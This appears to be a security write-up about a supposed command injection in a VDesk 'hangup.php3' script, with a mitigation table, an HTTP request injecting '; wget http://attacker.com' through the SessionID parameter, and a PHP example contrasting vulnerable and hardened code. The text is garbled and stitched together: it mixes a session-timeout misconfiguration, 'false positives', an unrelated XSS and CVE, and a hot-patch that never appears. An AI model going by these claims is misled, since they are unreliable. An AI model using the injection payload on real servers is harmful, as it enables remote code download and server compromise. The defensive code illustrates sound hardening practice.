Sometimes sessions are logged out unexpectedly at random intervals because the "Fallback Host" in the HTTP profile is incorrectly configured as /vdesk/hangup.php3.

False positives: many "exploit" reports involving hangup.php3
VDesk is a popular virtual desktop software that allows users to access and interact with virtual machines (VMs) remotely. The software provides a range of features, including VM management, user authentication, and session management. The Hangup PHP 3 plugin is a component of VDesk that enables users to manage and interact with virtual desktops using PHP scripts.
| Solution | Effectiveness |
|----------|---------------|
| Upgrade to version 4.0+ (rewritten without pcntl signal hacks) | Complete |
| Disable pcntl in PHP (disable_functions = pcntl_fork, pcntl_signal) | High |
| Switch to the Redis session handler (atomic operations) | High |
| Apply a web application firewall (WAF) rule blocking hangup.php3?sig_type=SIGHUP | Medium |
| Migrate from PHP 3.x/5.x to PHP 8.x (built-in session hardening) | Required |
If your vDesk version is end-of-life, you can hot-patch hangup.php3 by adding at the top:
Impact: full system compromise, unauthorized session termination, and data exposure.

Full system compromise, as the attacker can run commands with the privileges of the web server.

2. How the Exploit Works (Conceptual)

hangup.php3: invalidates the session's unique ID in the server's local session state, immediately cutting off that session's access to resources.
An attacker exploiting this vulnerability could achieve several critical objectives:
The specific XSS in my.logon.php3 is just one of the issues listed under CVE-2007-0186. The full scope includes:

```http
GET /vdesk/hangup.php3?SessionID=1234;%20wget%20http://attacker.com HTTP/1.1
Host: target-vdesk-server.com
User-Agent: Mozilla/5.0
```

In this scenario: the script reads the SessionID parameter; the URL-decoded semicolon terminates the intended internal command; the shell then runs wget, which downloads the attacker's software onto the server.
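The following is an added illustration of the mechanism described above, not the product's own hangup.php3 source: a hypothetical handler that interpolates the SessionID query value into a shell command line, placed beside a hardened version that allow-lists the value and quotes it. The helper binary name (/usr/local/bin/vdesk-hangup) and the assumed session-ID format (8 to 64 hex characters) are assumptions. Only the command strings are built, nothing is executed, so the script runs harmlessly offline.

```php
<?php
// Added example: hypothetical vulnerable vs. hardened construction of the
// hangup command. Not the product's code; HANGUP_BIN is an invented helper.
declare(strict_types=1);

const HANGUP_BIN = '/usr/local/bin/vdesk-hangup'; // hypothetical helper binary

// Vulnerable: the raw query value is interpolated into the command line.
// A real script would hand this string to shell_exec()/system(); here it is
// only returned so the example is safe to run.
function buildHangupCommandVulnerable(string $sessionId): string
{
    return HANGUP_BIN . ' ' . $sessionId;
}

// Hardened step 1: allow-list the value before it goes anywhere near a shell.
// Session IDs are assumed to be 8-64 hex characters (substitute the real format).
function isValidSessionId(string $sessionId): bool
{
    return preg_match('/\A[0-9a-fA-F]{8,64}\z/', $sessionId) === 1;
}

// Hardened step 2: quote even a validated value, so a later relaxation of the
// allow-list cannot silently reintroduce shell metacharacter injection.
function buildHangupCommandHardened(string $sessionId): string
{
    if (!isValidSessionId($sessionId)) {
        throw new InvalidArgumentException('SessionID rejected by allow-list');
    }
    return HANGUP_BIN . ' ' . escapeshellarg($sessionId);
}

// Constructed inputs: a benign ID and the injected value from the request
// above, URL-decoded (%20 -> space).
$inputs = [
    'a1b2c3d4e5f6',
    '1234; wget http://attacker.com',
];

foreach ($inputs as $input) {
    echo "input:      {$input}\n";
    // With the payload, the shell would see two commands: the hangup and wget.
    echo "vulnerable: " . buildHangupCommandVulnerable($input) . "\n";
    try {
        // The benign ID is accepted and single-quoted; the payload is rejected
        // because ';' and spaces are outside the allow-list.
        echo "hardened:   " . buildHangupCommandHardened($input) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "hardened:   " . $e->getMessage() . "\n";
    }
    echo "\n";
}
```

The allow-list is the real control; escapeshellarg() is defence in depth. Where possible the shell should be avoided entirely (for example by calling the session-invalidation logic directly or by passing arguments as an array to a process API), which removes the injection surface rather than filtering it.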